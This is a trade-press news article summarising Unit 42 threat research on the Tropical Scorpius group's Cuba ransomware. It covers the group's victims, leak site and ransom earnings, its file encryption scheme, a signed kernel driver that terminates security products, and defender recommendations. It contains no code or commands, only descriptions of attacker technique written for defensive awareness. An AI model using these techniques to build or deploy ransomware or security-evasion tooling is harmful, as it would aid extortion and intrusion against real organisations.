Unit 42 details Tropical Scorpius ransomware using new TTPs, RAT, local privilege escalation tool

New research from Palo Alto Networks’ Unit 42 team revealed that hackers are employing previously unseen tactics, techniques, and procedures (TTPs) of the Cuba ransomware, including a novel RAT (remote access trojan) and a new local privilege escalation tool. Currently tracked as Tropical Scorpius, it involves a new malware family that weaponized local privilege escalation exploit to SYSTEM, a new Kerberos tool that Unit 42 tracks as KerberCache, kernel driver for targeting security products, and identifying the use of the ZeroLogon hacktool.

“The Cuba Ransomware family first surfaced in December 2019. The threat actors behind this ransomware family have since changed their tactics and tooling to become a more prevalent threat in 2022,” Unit 42 researchers wrote in a blog post this week. “This ransomware has historically been distributed through Hancitor, which is usually delivered through malicious attachments. Tropical Scorpius has also been observed exploiting vulnerabilities in Microsoft Exchange Server, including ProxyShell and ProxyLogon.”

According to the researchers, the Tropical Scorpius ransomware group uses double extortion alongside a leak site that exposes organizations that have allegedly been compromised. “That said, this group didn’t have a leak site when first observed in 2019; we suspect the inspiration for adding one came from other ransomware groups such as Maze and REvil. The Cuba Ransomware leak site also includes a paid section where the threat actors share leaks that were sold to an interested party,” they added.

Data in Unit 42 Ransomware Threat Report reported observations of Cuba Ransomware impacting 33 organizations. “As of July 2022, Tropical Scorpius has used Cuba Ransomware to impact 27 additional organizations across multiple vectors, such as professional and legal services, state and local government, manufacturing, transportation and logistics, wholesale and retail, real estate, financial services, healthcare, high technology, utilities and energy, construction, and education. A total of 60 organizations were exposed by this ransomware gang on its leak site since the group first surfaced in 2019,” it added.

The researchers said that they suspect the number of victims is larger than the leak site shows since ransomware operators usually don’t release the data publicly if the victim pays the ransom. The FBI says the Cuba Ransomware gang made at least US$43.9 million from ransom payments and has demanded at least $74 million.

While it is clear the Tropical Scorpius threat actors are constantly developing and updating their toolkit, the core Cuba Ransomware payload has remained roughly the same since its discovery in 2019, Unit 42 researchers said. “The cryptographic algorithms are still taken from WolfSSL’s open source repository, specifically ChaCha for file encryption and RSA for key encryption.”

“Similarly to most ransomware families, Cuba Ransomware encrypts files differently depending on their size. If the file is less than 0x200000 bytes in length, the entire file is encrypted,” according to the researchers. “If not, Cuba Ransomware encrypts the files in chunks of 0x100000 bytes, with the break in between the encrypted chunks differing based on the overall size.”

Unit 42 team also said that each encrypted file is prepended with an initial 1024-byte header, containing the magic value ‘FIDEL[dot]CA, likely about Fidel Castro and following the Cuba theme. This is followed by an RSA-4096 encrypted block containing the file-specific ChaCha key and nonce. Finally, the extension [dot]cuba is appended to the filename after successfully encrypting a file.

The Unit 42 researchers also found another major update within the ransom note dropped by the ransomware, rather than relying solely on their Tor site. Additionally, they offer communication via TOX, which is slowly becoming more popular among ransomware groups due to its secure messaging functionality.

Unit 42 observed Tropical Scorpius before deploying ransomware, using tools and techniques to evade detection and move around in the compromised environment. “Tropical Scorpius leveraged a dropper that writes a kernel driver to the file system called ApcHelper[dot]sys. This targets and terminates security products. The dropper was not signed, however, the kernel driver was signed using the certificate found in the LAPSUS NVIDIA leak,” they added.

The researchers said that upon executing the kernel driver dropper/loader, the kernel dropper uses multiple Windows APIs to find the resource section and load the resource type named ‘Driver.’ The embedded PE file is the driver that will ultimately write to the file system in subsequent API calls.

“After the kernel driver drops onto the file system, the loader will first run a deletion command argument via cmd[dot]exe for the file path,” the Unit 42 researchers said. “After this, it will create a new service using cmd[dot]exe and run the argument below to set up a service for the kernel driver. Then the loader copies the kernel driver responsible for terminating security products onto the file system.” 

The core functionality of the kernel driver dropped and loaded is to resolve additional kernel APIs for performing functionality and targeting a list of security products for termination, according to the Unit 42 researchers. “The additional APIs are resolved using a string constant for the desired API name; each Windows API below is used in a function call to MmGetSystemRoutineAddress for returning a pointer to the function. Below is a list of additional kernel APIs resolved that were found within the sample,” they added.

After the additional APIs are resolved, the process of targeting security products begins, the Unit 42 team said. “A do-while loop is set up with the objective of checking the processes running on the system to see if they match an item from the security products targeted,” they added.

The researchers said that the Tropical Scorpius threat actor leveraged various tools for the initial system reconnaissance. “ADFind and Net Scan were downloaded from the web hosting platform tmpfiles[dot]org by using PowerShell’s Invoke-WebRequest. Both tools were dropped onto the same system with shortened names to obscure their purpose.”

Unit 42 evaluates that Tropical Scorpius remains an active threat, as the group’s activity makes it clear that an approach to tradecraft using a hybrid of more nuanced tools focusing on low-level Windows internals. Additionally, the move helps with defense evasion, and local privilege escalation can be highly effective during an intrusion.

It recommends that defenders have advanced logging capabilities deployed and appropriately configured, such as Sysmon, Windows Command Line logging, and PowerShell logging – forwarding to a Security Information and Event Management tool (SIEM) to create queries and detection opportunities. Additionally, computers must be patched and up to date wherever possible to reduce attack surfaces related to exploitation techniques. 

Furthermore, organizations can deploy an XDR/EDR solution to perform in-memory inspection and detect process injection techniques. It also conducts threat hunting for unusual behavior related to security product defense evasion, service accounts for lateral movement, and domain administrator-related user behavior.

Earlier this month, Zscaler researchers released details of the Industrial Spy ransomware group that introduced their ransomware to create double extortion attacks that combine data theft with file encryption after their initial promotional campaigns. The threat group appears to have also tried Cuba ransomware briefly before developing their ransomware in May this year.

Anna Ribeiro

Industrial Cyber News Editor. Anna Ribeiro is a freelance journalist with over 14 years of experience in the areas of security, data storage, virtualization and IoT.